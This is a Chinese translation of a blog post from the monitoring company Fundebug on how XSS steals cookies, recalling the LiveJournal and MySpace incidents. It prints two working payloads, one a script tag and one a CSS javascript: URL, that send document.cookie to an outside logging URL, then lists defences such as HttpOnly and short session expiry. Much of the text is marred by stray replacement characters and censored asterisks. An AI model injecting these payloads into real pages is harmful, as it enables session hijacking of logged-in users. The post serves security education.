XSS之竊取Cookie
譯者按: 10年前的博客似乎有點老了��,但是**XSS*****的威脅依然還在����,我們不得不防���。
為了保證可讀性����,本文采用意譯而非直譯����。另外����,本文版權歸原作者所有���,翻譯僅用于學習�����。
竊取Cookie是非常簡單的���,因此不要輕易相信客戶端所聲明的身份��。即便這個Cookie是在數秒之前驗證過����,那也未必是真的�,尤其當你僅使用Cookie驗證客戶端的時候�。
2006年1月�,LiveJournal遭到了**XSS*****��,這個事件足以警示我們�。還有�,2006年10月��,MySapce也遭到了**XSS*****����,這告訴我們必須非常謹慎地過濾用戶發布的文本����,因為*可以在文本中摻雜一些JavaScript代碼�����,以此竊取登陸用戶的Cookie**�。
正如****LiveJournal那樣��,你不需要在登陸用戶的瀏覽器進行任何操作�,而可以在第三方進行所有操作�����。更糟糕的是�,竊取Cookie事實上操作起來非常簡單�����,但是防范起來卻非常困難**�。
下面的的JavaScript代碼就可以竊取Cookie��,是不是很簡單��?
<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>
如果我可以將這段代碼插入到某個登陸用戶的頁面�,則Cookie就會通過HTTP請求發送給我����,然后我就可以偽造那個可憐的登陸用戶了����!
在IE瀏覽器上�,可以通過在CSS代碼中執行JavaScript來竊取Cookie��,也很簡單�。
<style>
.getcookies{
background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');
}
</style>
<p class="getcookies"></p>
如果你對用戶發布的文本內容不進行嚴格的過濾的話�,*就可以很方便地竊取Cookie����。是不是很可怕��?如果你是一個負責任的開發者的話����,你就應該保持警惕��!因此����,你必須假設所有用戶的Cookie都被竊取了����。注意���,是所有用戶**�,對于這一點��,我不想含糊其辭����。
為了保證安全:請不停地重設session的重設�����;將過期時間設置短一些�;監控referrer與userAgent的值�;使用HttpOnly禁止腳本讀取Cookie�。這些措施并非萬無一失��,但是增加了***的難度��,因此也是有效的���。
如果你對MySapce遭到的**XSS*****不了解�����,可以查看*本人公開的技術細節�����,很有趣�,不過切勿模仿����,因為他為自己的行為此付出了不小的代價:三年內被禁止使用電腦��!**�����。
參考鏈接
- 9.3 避免XSS***
- 薩米 (計算機蠕蟲)
- Technical explanation of The MySpace Worm
- Account Hijackings Force LiveJournal Changes
關于Fundebug
Fundebug專注于JavaScript����、微信小程序�、微信小游戲�����、支付寶小程序��、React Native���、Node.js和Java實時BUG監控����。 自從2016年雙十一正式上線�����,Fundebug累計處理了7億+錯誤事件�,得到了Google����、360����、金山軟件�����、百姓網等眾多知名用戶的認可����。歡迎免費試用��!
版權聲明
轉載時請注明作者Fundebug以及本文地址:
https://blog.fundebug.com/2017/08/16/xss_steal_cookie/
